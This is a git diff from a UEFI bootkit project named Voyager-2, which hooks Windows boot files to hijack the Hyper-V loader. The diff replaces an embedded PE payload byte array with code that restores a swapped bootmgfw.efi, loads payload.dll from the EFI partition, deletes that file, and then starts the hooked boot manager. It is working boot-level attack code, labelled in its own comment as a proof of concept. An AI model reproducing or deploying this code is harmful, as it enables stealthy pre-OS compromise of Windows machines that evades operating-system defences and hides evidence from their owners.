0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00 -}; \ No newline at end of file + EFI_STATUS Result = EFI_SUCCESS; + UINTN HandleCount = NULL; + EFI_HANDLE* Handles = NULL; + EFI_FILE_HANDLE VolumeHandle; + EFI_FILE_HANDLE PayLoadFileHandle; + EFI_DEVICE_PATH* PayLoadDevicePath = NULL; + EFI_FILE_IO_INTERFACE* FileSystem = NULL; + EFI_FILE_PROTOCOL* PayLoadFile = NULL; + + if (EFI_ERROR((Result = gBS->LocateHandleBuffer(ByProtocol, &gEfiSimpleFileSystemProtocolGuid, NULL, &HandleCount, &Handles)))) + { + Print(L"error getting file system handles -> 0x%p\n", Result); + return Result; + } + + for (UINT32 Idx = 0u; Idx < HandleCount; ++Idx) + { + if (EFI_ERROR((Result = gBS->OpenProtocol(Handles[Idx], &gEfiSimpleFileSystemProtocolGuid, (VOID**)&FileSystem, gImageHandle, NULL, EFI_OPEN_PROTOCOL_GET_PROTOCOL)))) + { + Print(L"error opening protocol -> 0x%p\n", Result); + return Result; + } + + if (EFI_ERROR((Result = FileSystem->OpenVolume(FileSystem, &VolumeHandle)))) + { + Print(L"error opening file system -> 0x%p\n", Result); + return Result; + } + + if (!EFI_ERROR((Result = VolumeHandle->Open(VolumeHandle, &PayLoadFileHandle, PAYLOAD_PATH, EFI_FILE_MODE_READ, EFI_FILE_READ_ONLY)))) + { + VolumeHandle->Close(VolumeHandle); + PayLoadDevicePath = FileDevicePath(Handles[Idx], PAYLOAD_PATH); + + if (EFI_ERROR((Result = EfiOpenFileByDevicePath(&PayLoadDevicePath, &PayLoadFile, EFI_FILE_MODE_WRITE | EFI_FILE_MODE_READ, NULL)))) + { + Print(L"failed to open payload file... reason -> %r\n", Result); + return Result; + } + + EFI_FILE_INFO* FileInfoPtr = NULL; + UINTN FileInfoSize = NULL; + + if (EFI_ERROR((Result = PayLoadFile->GetInfo(PayLoadFile, &gEfiFileInfoGuid, &FileInfoSize, NULL)))) + { + if (Result == EFI_BUFFER_TOO_SMALL) + { + gBS->AllocatePool(EfiBootServicesData, FileInfoSize, &FileInfoPtr); + if (EFI_ERROR(Result = PayLoadFile->GetInfo(PayLoadFile, &gEfiFileInfoGuid, &FileInfoSize, FileInfoPtr))) + { + Print(L"get backup file information failed... reason -> %r\n", Result); + return Result; + } + } + else + { + Print(L"Failed to get file information... reason -> %r\n", Result); + return Result; + } + } + + VOID* PayLoadBuffer = NULL; + UINTN PayLoadSize = FileInfoPtr->FileSize; + gBS->AllocatePool(EfiBootServicesData, FileInfoPtr->FileSize, &PayLoadBuffer); + + if (EFI_ERROR((Result = PayLoadFile->Read(PayLoadFile, &PayLoadSize, PayLoadBuffer)))) + { + Print(L"Failed to read payload file into buffer... reason -> %r\n", Result); + return Result; + } + + if (EFI_ERROR((Result = PayLoadFile->Delete(PayLoadFile)))) + { + Print(L"unable to delete payload file... reason -> %r\n", Result); + return Result; + } + + *PayLoadBufferPtr = PayLoadBuffer; + gBS->FreePool(FileInfoPtr); + return EFI_SUCCESS; + } + } + + Print(L"unable to find payload on disk...\n"); + return EFI_ABORTED; +} \ No newline at end of file diff --git a/Voyager-2/Voyager-2 (1703-1511)/PayLoad.h b/Voyager-2/Voyager-2 (1703-1511)/PayLoad.h index cce752e..94b94dd 100644 --- a/Voyager-2/Voyager-2 (1703-1511)/PayLoad.h +++ b/Voyager-2/Voyager-2 (1703-1511)/PayLoad.h @@ -1,6 +1,7 @@ #pragma once #include "Utils.h" -extern unsigned char PayLoad[2560]; +#include +extern VOID* PayLoad; #pragma pack(push, 1) typedef struct _VOYAGER_T @@ -10,8 +11,12 @@ typedef struct _VOYAGER_T UINT64 HypervModuleSize; UINT64 ModuleBase; UINT64 ModuleSize; -} VOYAGER_T, *PVOYAGER_T; +} VOYAGER_T, * PVOYAGER_T; #pragma pack(pop) +#define WINDOWS_BOOTMGFW_PATH L"\\efi\\microsoft\\boot\\bootmgfw.efi" +#define PAYLOAD_PATH L"\\efi\\microsoft\\boot\\payload.dll" + UINT32 PayLoadSize(VOID); +EFI_STATUS LoadPayLoadFromDisk(VOID** PayLoadBufferPtr); VOID* PayLoadEntry(VOID* ModuleBase); \ No newline at end of file diff --git a/Voyager-2/Voyager-2 (1703-1511)/UefiMain.c b/Voyager-2/Voyager-2 (1703-1511)/UefiMain.c index 42b7ad3..2180f6b 100644 --- a/Voyager-2/Voyager-2 (1703-1511)/UefiMain.c +++ b/Voyager-2/Voyager-2 (1703-1511)/UefiMain.c @@ -4,36 +4,59 @@ CHAR8* gEfiCallerBaseName = "Voyager 2"; const UINT32 _gUefiDriverRevision = 0x200; -EFI_STATUS EFIAPI UefiUnload( - IN EFI_HANDLE ImageHandle -) -{ return EFI_SUCCESS; } - -EFI_STATUS EFIAPI UefiMain -( - IN EFI_HANDLE ImageHandle, - IN EFI_SYSTEM_TABLE* SystemTable -) +EFI_STATUS EFIAPI UefiUnload(EFI_HANDLE ImageHandle) +{ + return EFI_SUCCESS; +} + +EFI_STATUS UefiMain(EFI_HANDLE ImageHandle, EFI_SYSTEM_TABLE* SystemTable) { EFI_STATUS Result; - EFI_DEVICE_PATH_PROTOCOL* BootMgfwPath; + EFI_HANDLE BootMgfwHandle; gST->ConOut->ClearScreen(gST->ConOut); gST->ConOut->OutputString(gST->ConOut, AsciiArt); Print(L"\n"); + // since we replaced bootmgfw on disk, we are going to need to restore the image back + // this is simply just moving bootmgfw.efi.backup to bootmgfw.efi... if (EFI_ERROR((Result = RestoreBootMgfw()))) { Print(L"unable to restore bootmgfw... reason -> %r\n", Result); + gBS->Stall(5 * 1000000); + return Result; + } + + // the payload is sitting on disk... we are going to load it into memory... + if (EFI_ERROR((Result = LoadPayLoadFromDisk(&PayLoad)))) + { + Print(L"failed to read payload from disk... reason -> %r\n", Result); + gBS->Stall(5 * 1000000); return Result; } - if (EFI_ERROR((Result = InstallBootMgfwHooks(ImageHandle)))) + EFI_DEVICE_PATH* BootMgfwPath = GetBootMgfwPath(); + if (EFI_ERROR((Result = gBS->LoadImage(TRUE, ImageHandle, BootMgfwPath, NULL, NULL, &BootMgfwHandle)))) + { + Print(L"failed to load bootmgfw.efi...\n"); + gBS->Stall(5 * 1000000); + return EFI_ABORTED; + } + + if (EFI_ERROR((Result = InstallBootMgfwHooks(BootMgfwHandle)))) { Print(L"Failed to install bootmgfw hooks... reason -> %r\n", Result); + gBS->Stall(5 * 1000000); return Result; } + if (EFI_ERROR(gBS->StartImage(BootMgfwHandle, NULL, NULL))) + { + Print(L"Failed to start bootmgfw.efi...\n"); + gBS->Stall(5 * 1000000); + return EFI_ABORTED; + } + gBS->Stall(5 * 1000000); return EFI_SUCCESS; } \ No newline at end of file diff --git a/Voyager-2/Voyager-2 (1703-1511)/WinLoad.c b/Voyager-2/Voyager-2 (1703-1511)/WinLoad.c index a717e40..d9be67d 100644 --- a/Voyager-2/Voyager-2 (1703-1511)/WinLoad.c +++ b/Voyager-2/Voyager-2 (1703-1511)/WinLoad.c @@ -43,7 +43,7 @@ EFI_STATUS EFIAPI BlImgLoadPEImageEx(VOID* a1, VOID* a2, CHAR16* ImagePath, UINT #if WINVER == 1703 MakeShitHook(&HvLoadImageBufferHook, RESOLVE_RVA(LoadImage, 5, 1), &HvBlImgLoadPEImageFromSourceBuffer, TRUE); -#elif WINVER <= 1607 // 1511 is the same... +#elif WINVER <= 1607 MakeShitHook(&HvLoadImageHook, RESOLVE_RVA(LoadImage, 5, 1), &HvBlImgLoadPEImageEx, TRUE); #endif diff --git a/Voyager-2/Voyager-2 (2004-1709)/BootMgfw.c b/Voyager-2/Voyager-2 (2004-1709)/BootMgfw.c index 756cc6b..200e64d 100644 --- a/Voyager-2/Voyager-2 (2004-1709)/BootMgfw.c +++ b/Voyager-2/Voyager-2 (2004-1709)/BootMgfw.c @@ -131,6 +131,49 @@ EFI_STATUS EFIAPI RestoreBootMgfw(VOID) return EFI_ABORTED; } +EFI_DEVICE_PATH* EFIAPI GetBootMgfwPath(VOID) +{ + UINTN HandleCount = NULL; + EFI_STATUS Result; + EFI_HANDLE* Handles = NULL; + EFI_DEVICE_PATH* DevicePath = NULL; + EFI_FILE_HANDLE VolumeHandle; + EFI_FILE_HANDLE BootMgfwHandle; + EFI_FILE_IO_INTERFACE* FileSystem = NULL; + + if (EFI_ERROR((Result = gBS->LocateHandleBuffer(ByProtocol, &gEfiSimpleFileSystemProtocolGuid, NULL, &HandleCount, &Handles)))) + { + Print(L"error getting file system handles -> 0x%p\n", Result); + return DevicePath; + } + + for (UINT32 Idx = 0u; Idx < HandleCount && !FileSystem; ++Idx) + { + if (EFI_ERROR((Result = gBS->OpenProtocol(Handles[Idx], &gEfiSimpleFileSystemProtocolGuid, (VOID**)&FileSystem, gImageHandle, NULL, EFI_OPEN_PROTOCOL_GET_PROTOCOL)))) + { + Print(L"error opening protocol -> 0x%p\n", Result); + return DevicePath; + } + + if (EFI_ERROR((Result = FileSystem->OpenVolume(FileSystem, &VolumeHandle)))) + { + Print(L"error opening file system -> 0x%p\n", Result); + return DevicePath; + } + + if (!EFI_ERROR(VolumeHandle->Open(VolumeHandle, &BootMgfwHandle, WINDOWS_BOOTMGFW_PATH, EFI_FILE_MODE_READ, EFI_FILE_READ_ONLY))) + DevicePath = FileDevicePath(Handles[Idx], WINDOWS_BOOTMGFW_PATH); + + VolumeHandle->Close(BootMgfwHandle); + if (EFI_ERROR((Result = gBS->CloseProtocol(Handles[Idx], &gEfiSimpleFileSystemProtocolGuid, gImageHandle, NULL)))) + { + Print(L"error closing protocol -> 0x%p\n", Result); + return DevicePath; + } + } + return DevicePath; +} + EFI_STATUS EFIAPI InstallBootMgfwHooks(EFI_HANDLE BootMgfwPath) { EFI_STATUS Result = EFI_SUCCESS; diff --git a/Voyager-2/Voyager-2 (2004-1709)/BootMgfw.h b/Voyager-2/Voyager-2 (2004-1709)/BootMgfw.h index 3c9b4f3..110db33 100644 --- a/Voyager-2/Voyager-2 (2004-1709)/BootMgfw.h +++ b/Voyager-2/Voyager-2 (2004-1709)/BootMgfw.h @@ -32,5 +32,6 @@ static_assert(sizeof(START_BOOT_APPLICATION_SIG) == sizeof(START_BOOT_APPLICATIO extern SHITHOOK BootMgfwShitHook; typedef EFI_STATUS(EFIAPI* IMG_ARCH_START_BOOT_APPLICATION)(VOID*, VOID*, UINT32, UINT8, VOID*); EFI_STATUS EFIAPI RestoreBootMgfw(VOID); +EFI_DEVICE_PATH* EFIAPI GetBootMgfwPath(VOID); EFI_STATUS EFIAPI InstallBootMgfwHooks(EFI_HANDLE BootMgfwPath); EFI_STATUS EFIAPI ArchStartBootApplicationHook(VOID* AppEntry, VOID* ImageBase, UINT32 ImageSize, UINT8 BootOption, VOID* ReturnArgs); diff --git a/Voyager-2/Voyager-2 (2004-1709)/PayLoad.c b/Voyager-2/Voyager-2 (2004-1709)/PayLoad.c index 364a941..5e277a8 100644 --- a/Voyager-2/Voyager-2 (2004-1709)/PayLoad.c +++ b/Voyager-2/Voyager-2 (2004-1709)/PayLoad.c @@ -1,5 +1,9 @@ #include "PayLoad.h" +// this can also just be set at compile time if you want too, but for PoC im going +// to read the payload from disk and delete it after... +VOID* PayLoad = NULL; + UINT32 PayLoadSize(VOID) { EFI_IMAGE_DOS_HEADER* RecordDosImageHeader = PayLoad; @@ -26,220 +30,91 @@ VOID* PayLoadEntry(VOID* ModuleBase) return (UINT64)ModuleBase + RecordNtHeaders->OptionalHeader.AddressOfEntryPoint; } -unsigned char PayLoad[2560] = +EFI_STATUS LoadPayLoadFromDisk(VOID** PayLoadBufferPtr) { - 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, - 0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0xB8, 0x00, 0x00, 0x00, 0x0E, 0x1F, 0xBA, 0x0E, 0x00, 0xB4, 0x09, 0xCD, - 0x21, 0xB8, 0x01, 0x4C, 0xCD, 0x21, 0x54, 0x68, 0x69, 0x73, 0x20, 0x70, - 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x63, 0x61, 0x6E, 0x6E, 0x6F, - 0x74, 0x20, 0x62, 0x65, 0x20, 0x72, 0x75, 0x6E, 0x20, 0x69, 0x6E, 0x20, - 0x44, 0x4F, 0x53, 0x20, 0x6D, 0x6F, 0x64, 0x65, 0x2E, 0x0D, 0x0D, 0x0A, - 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2F, 0xBF, 0x31, 0xDD, - 0x6B, 0xDE, 0x5F, 0x8E, 0x6B, 0xDE, 0x5F, 0x8E, 0x6B, 0xDE, 0x5F, 0x8E, - 0xDC, 0xAF, 0x5A, 0x8F, 0x6A, 0xDE, 0x5F, 0x8E, 0xDC, 0xAF, 0x5F, 0x8F, - 0x6A, 0xDE, 0x5F, 0x8E, 0xDC, 0xAF, 0x5D, 0x8F, 0x6A, 0xDE, 0x5F, 0x8E, - 0x52, 0x69, 0x63, 0x68, 0x6B, 0xDE, 0x5F, 0x8E, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x50, 0x45, 0x00, 0x00, 0x64, 0x86, 0x04, 0x00, - 0xAD, 0xAA, 0x76, 0x5F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0xF0, 0x00, 0x22, 0x20, 0x0B, 0x02, 0x0E, 0x1B, 0x00, 0x02, 0x00, 0x00, - 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, - 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, - 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, - 0x0A, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x50, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x20, 0x8A, 0x00, 0x00, - 0x01, 0x00, 0x60, 0x01, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, - 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, - 0x38, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 0x74, 0x00, 0x00, 0x00, - 0x69, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, - 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x68, 0x2E, 0x72, 0x64, 0x61, - 0x74, 0x61, 0x00, 0x00, 0xF4, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, - 0x00, 0x02, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x48, - 0x2E, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x00, 0x28, 0x00, 0x00, 0x00, - 0x00, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x40, 0x00, 0x00, 0xC8, 0x2E, 0x65, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, - 0x65, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, - 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x65, 0x48, 0x8B, 0x04, 0x25, 0x00, 0x00, 0x00, - 0x00, 0x4C, 0x8B, 0x80, 0xF0, 0x82, 0x00, 0x00, 0x49, 0x8B, 0x80, 0x88, - 0x00, 0x00, 0x00, 0x4C, 0x8B, 0x80, 0x80, 0x0C, 0x00, 0x00, 0x49, 0x83, - 0x78, 0x70, 0x72, 0x75, 0x33, 0x48, 0xB8, 0xEF, 0xBE, 0xAD, 0xDE, 0xEF, - 0xBE, 0xAD, 0xDE, 0x48, 0x39, 0x42, 0x08, 0x75, 0x23, 0x49, 0x8B, 0x80, - 0xC8, 0x00, 0x00, 0x00, 0x49, 0x89, 0x80, 0x78, 0x05, 0x00, 0x00, 0x49, - 0xC7, 0x80, 0xF8, 0x05, 0x00, 0x00, 0xEE, 0xFF, 0xC0, 0x00, 0x65, 0x48, - 0x8B, 0x04, 0x25, 0x00, 0x00, 0x00, 0x00, 0xC3, 0x48, 0x8D, 0x05, 0xA1, - 0xFF, 0xFF, 0xFF, 0x48, 0x2B, 0x05, 0x9A, 0x1F, 0x00, 0x00, 0x48, 0xFF, - 0xE0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 